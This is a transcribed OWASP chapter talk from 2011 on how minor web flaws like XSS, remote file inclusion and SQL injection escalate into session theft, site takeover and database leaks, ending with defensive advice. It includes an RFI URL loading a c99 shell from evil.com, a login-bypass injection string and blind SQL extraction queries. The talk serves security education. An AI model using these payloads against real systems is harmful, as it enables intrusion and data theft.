ANZTB SIGIST May 2011 Perth OWASP How minor vulnerabilities can do very bad things. OWASP Wednesday 25 th May The OWASP Foundation

Similar documents
OWASP Top 10 The Ten Most Critical Web Application Security Risks

DEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology

OWASP TOP Release. Andy Willingham June 12, 2018 OWASP Cincinnati

Securing Your Company s Web Presence

C1: Define Security Requirements

Aguascalientes Local Chapter. Kickoff

Web Application Security. Philippe Bogaerts

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

Copyright

Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West

Web Application Penetration Testing

John Coggeshall Copyright 2006, Zend Technologies Inc.

Application vulnerabilities and defences

Application Security through a Hacker s Eyes James Walden Northern Kentucky University

THREAT MODELING IN SOCIAL NETWORKS. Molulaqhooa Maoyi Rotondwa Ratshidaho Sanele Macanda

NET 311 INFORMATION SECURITY

Jacksonville Linux User Group Presenter: Travis Phillips Date: 02/20/2013

Penetration Testing following OWASP. Boyan Yanchev Chief Technology Ofcer Peter Dimkov IS Consultant

Application Security Introduction. Tara Gu IBM Product Security Incident Response Team

Solutions Business Manager Web Application Security Assessment

Kishin Fatnani. Founder & Director K-Secure. Workshop : Application Security: Latest Trends by Cert-In, 30 th Jan, 2009

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

SECURITY TESTING. Towards a safer web world

Top 10 Web Application Vulnerabilities

CSCD 303 Essential Computer Security Fall 2018

CSCD 303 Essential Computer Security Fall 2017

Hacker Attacks on the Horizon: Web 2.0 Attack Vectors

W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s

Featuring. and. Göteborg. Ulf Larson Thursday, October 24, 13

Advanced Web Technology 10) XSS, CSRF and SQL Injection

An analysis of security in a web application development process

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

CSCE 813 Internet Security Case Study II: XSS

Your Turn to Hack the OWASP Top 10!

Web Security Computer Security Peter Reiher December 9, 2014

OWASP Top 10. Copyright 2017 Ergon Informatik AG 2/13

P2_L12 Web Security Page 1

Securing ArcGIS for Server. David Cordes, Raj Padmanabhan

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

GUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.

This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in

CNIT 129S: Securing Web Applications. Ch 10: Attacking Back-End Components

Holistic Database Security

Content Security Policy

1 About Web Security. What is application security? So what can happen? see [?]

Why bother? Causes of data breaches OWASP. Top ten attacks. Now what? Do it yourself Questions?

Hacking Oracle APEX. Welcome. About

Web Security. Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le

Under the hood testing - Code Reviews - - Harshvardhan Parmar

Perslink Security. Perslink Security. Eleonora Petridou Pascal Cuylaerts. System And Network Engineering University of Amsterdam.

OWASP TOP OWASP TOP

Avoiding Web Application Flaws In Embedded Devices. Jake Edge LWN.net URL for slides:

OWASP. The OWASP Foundation Shake Hands With BeEF

Cyber Security & Ethical Hacking Training. Introduction to Cyber Security Introduction to Cyber Security. Linux Operating System and Networking: LINUX

CSCE 548 Building Secure Software SQL Injection Attack

F5 Application Security. Radovan Gibala Field Systems Engineer

Mobile Malfeasance. Exploring Dangerous Mobile Code. Jason Haddix, Director of Penetration Testing

CIS 4360 Secure Computer Systems XSS

Threat Landscape 2017

Evaluating the Security Risks of Static vs. Dynamic Websites

Web Application Security

Application Security & Verification Requirements

PHP Security. Kevin Schroeder Zend Technologies. Copyright 2007, Zend Technologies Inc.

WebGoat Lab session overview

Presentation Overview

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

A D V I S O R Y S E R V I C E S. Web Application Assessment

CLOUD COMPUTING SECURITY THE SOFT SPOT Security by Application Development Quality Assurance

Overtaking Google Desktop Leveraging XSS to Raise Havoc. 6 th OWASP AppSec Conference. The OWASP Foundation

eb Security Software Studio

Web insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.

Hacking Intranet Websites from the Outside

WAPT in pills: Self-paced, online, flexible access interactive slides. 4+ hours of video materials

Information Security CS 526 Topic 8

Don t blink or how to create secure software. Bozhidar Bozhanov, LogSentinel

Bank Infrastructure - Video - 1

OWASP Thailand. Proxy Caches and Web Application Security. OWASP AppSec Asia October 21, Using the Recent Google Docs 0-Day as an Example

Security and Privacy. SWE 432, Fall 2016 Design and Implementation of Software for the Web

What someone said about junk hacking

The OWASP Foundation

INF3700 Informasjonsteknologi og samfunn. Application Security. Audun Jøsang University of Oslo Spring 2015

Web Application Threats and Remediation. Terry Labach, IST Security Team

HP 2012 Cyber Security Risk Report Overview

Computer Forensics: Investigating Network Intrusions and Cyber Crime, 2nd Edition. Chapter 3 Investigating Web Attacks

Base64 The Security Killer

CSE361 Web Security. Attacks against the server-side of web applications. Nick Nikiforakis

Slides adopted from Laurie Williams. OWASP Top Ten. John Slankas

Web basics: HTTP cookies

Web Application Whitepaper

WEB SECURITY: XSS & CSRF

AppSpider Enterprise. Getting Started Guide

IBM Future of Work Forum

COMP9321 Web Application Engineering

5 IT security hot topics How safe are you?

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

Web Security. Web Programming.

OWASP Application Security Verification Standard (ASVS) Web Application Edition OWASP 03/09. The OWASP Foundation

Common Websites Security Issues. Ziv Perry

Exploiting and Defending: Common Web Application Vulnerabilities

Maximizing the speed of time based SQL injection data retrieval

Transcription:

ANZTB SIGIST May 2011 Perth OWASP How minor vulnerabilities can do very bad things Christian Frichot / David Taylor (Some of) Perth OWASP s Chapter Leads OWASP Wednesday 25 th May 2011 Copyright The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org

Introductions Photo of handshake removed to reduce file size. OWASP

Why we think this is important. OWASP

Impact Crater 4

Photo of bored cat removed to reduce file size. *bored cat 5

Photo of scared cat removed to reduce file size. *scared cat is scared 6

Overview Overview of the evening From XSS to total session compromise Would you like some BeEF with your XSS? Remote File Include, an attackers best friend. When RFI met Metasploit Useful SQL Injection OWASP 7

A Brief History Of OWASP 8

Cross Site Scripting (XSS) "XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute script in the victim s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. What does this mean? Attackers can execute scripts within a users browser. This may lead to defacement, session hijacking, browser redirection or even the installation of malware. OWASP 9

Reflective XSS Authenticated User 2. XSS script forces Browser to submit document.cookie to Evil Server Hi Joe, We ve noticed you haven t updated your phone number. Click here to proceed. Thanks. 1. 3. document.cookie Vulnerable App 4. Collect cookies Attacker Evil Server OWASP 10

Stored XSS Vulnerable App Authenticated User 1. Post comment on blog Including XSS 2. Visits blog Attacker 4. Collect cookies kie 3. document.cooki Evil Server OWASP 11

Injection "Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or access unauthorised data. What does this mean? Injection can result in data loss or corruption, lack of accountability, or denial of access. In worst case scenarios it can lead to complete OWASP 12 host takeover.

Setting the scene Your developers create a Secure Cloud Open Access Tool Secure portal for exchanging files with customers. Your company, Acme, take their information very seriously, as most of their intellectual property is contained within. OWASP 13

This slide left intentionally blank 14

Conclusions from Session Compromise According to the OWASP Top 10 of 2010, XSS is the most prevalent web application security flaw. The Web Hacking Incident Database (WHID) lists XSS as the 3 rd top attack method.[1] Detecting XSS is easy. Open Source: w3af, rat, XSSscan.py, XSSFuzz etc Mixed Source: Burp! (If you buy one piece of software, buy this) Bling ($$) Source: IBM AppScan, HP WebInspect, NTOSpider [1] http://www.xiom.com/whid OWASP 15

16

Photo of person removed to reduce file size. Session Compromise 17

OWASP 18

Browser Exploitation Framework Photo of meat removed to reduce file size. OWASP 19

OWASP

(insert demo here) OWASP 21

Conclusions from BeEF injection ;) Why do things manually, when you can do them automagically? The web browser IS the operating system. Clearly demonstrates how a fairly trivial vulnerability can explode into something larger OWASP

OWASP

(insert break here) OWASP 24

OWASP

Photo of Nano car removed to reduce file size. *Planet's cheapest car, the Nano. OWASP

Photo of Bentley Coupe removed to reduce file size. *This is a Bentley Coupe!= planet s cheapest car OWASP

OWASP

OWASP

OWASP

But how does an attacker deface a website? RFI or Remote File Inclusion Was in OWASP s Top 10 in 2007 Used to be highly prevalent in PHP until the default configuration was changed Exploits the require or include functions, eg: Include $_GET[ option ] http://www.acme.com/scoat.php?language=http://evil.com/c99.txt OWASP

(insert scariness here) OWASP 32

Conclusions The web is a great channel for exploiting PCs Google s research back in 2007 highlighted: One in 10 web pages contained malicious code F-secure 2010: Adobe Reader files were exploited in almost 49% of targeted attacks in 2009 Keep your applications up to date! OWASP

OWASP

SQL Injection The login page of the application is vulnerable to SQL Injection: SELECT $id FROM dt_users WHERE user= $user AND pass= $pass What happens if we make the username: jdoe AND 1=1 -- The SQL becomes SELECT $id FROM dt_users WHERE user= jdoe AND 1=1 AND pass= $pass OWASP

Blind SQL Injection So, we can log into the app without a password - pretty cool. But what if we want to mess with the database some more? The SQL Injection is blind because none of the results from the SELECT are echoed to the browser. OWASP

Taking Over The World, 1 Bit At A Time Essentially we can get 1 bit of data from the database at a time: If the trailing condition evaluates to TRUE, the application gets logged in. If the trailing condition evaluates to FALSE you get the password error message. For example: SELECT $id FROM dt_users WHERE user= jdoe AND 1<2 TRUE SELECT $id FROM dt_users WHERE user= jdoe AND 1>2 FALSE OWASP

Lets take a short detour Binary Search Photo of detour sign removed to reduce file size. OWASP

Detour: Binary Search OWASP

Detour: Binary Search Example: Searching for an ASCII character Is character < ASCII code 128? Yes Is character < ASCII code 64? No Is character < ASCII code 96? Yes Is character < ASCII code 80? No Is character < ASCII code 88? No Is character < ASCII code 92? Yes Is character < ASCII code 90? Yes Is character < ASCII code 89? No Character is ASCII 89! ( X ) OWASP

Detour: Binary Search Each step in a binary search requires 1 bit of information. We have a SQL Injection bug that reveals 1 bit of information at a time. Binary search, meet Blind SQL Injection. Blind SQL Injection, this is Binary Search. OWASP

Blind SQL Injection Setting it up SUBSTRING(CAST((SELECT SELECT version() ASCII(SUBSTRING(CAST((SELECT version()) version()) CHAR(4000)) version()) AS CHAR(4000)),1,1)) OWASP

Blind SQL Injection Putting it into action SELECT WHERE user= jdoe AND 64>(SELECT 96>(SELECT 128>(SELECT ASCII(SUBSTRING(CAST((SELECT version()) AS CHAR(4000)),1,1))) And so on And so on And so on And THEN SELECT WHERE user= jdoe AND 128>(SELECT ASCII(SUBSTRING(CAST((SELECT version()) AS CHAR(4000)),2,1))) And so on And so on And so on And so on OWASP

Blind SQL Injection Luckily there are tools to do this for us. (insert pwnage here) OWASP

Conclusions (BSQLi) Tiny little blind SQL injection bugs can (eventually) leak your entire database BSQLi bugs are pretty hard to find (unless you ve got the source code) Even after you ve found them, they are reasonably difficult (and noisy) to exploit Validate inputs and use parameterised queries OWASP

No tools were harmed in the making of this presentation BeEF (http://www.bindshell.net/tools/beef/) Metasploit Framework (http://www.metasploit.com/) SQLMap (http://sqlmap.sourceforge.net/) SQL Power Injector *not demonstrated (http://www.sqlpowerinjector.com/) Burp Suite Professional (http://portswigger.net/burp/) OWASP

Photo of many spanners removed to reduce file size. OWASP 47

OWASP 48

OWASP 49

OWASP Enterprise Security API (ESAPI) Don t write your own security controls! Reinventing the wheel when it comes to developing security controls for every web application or web service leads to wasted time and massive security holes OWASP 50

ESAPI not just about preventing XSS/SQLi Authentication Access Control Input Validation Output encoding/escaping Cryptography Error handling and logging Communication security HTTP security Security configuration OWASP 51

OWASP s Development Guide Allow businesses, developers, designers and solution architects to produce secure web applications OWASP 52

OWASP 53

OWASP 54

Wrapping it up Relatively innocuous bugs can be leveraged to do bad things (to the client or the server) Weaponised exploitation frameworks and tools currently exist Secure coding practices and security assessments to minimise exposure OWASP

Photo of large question mark removed to reduce file size.

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback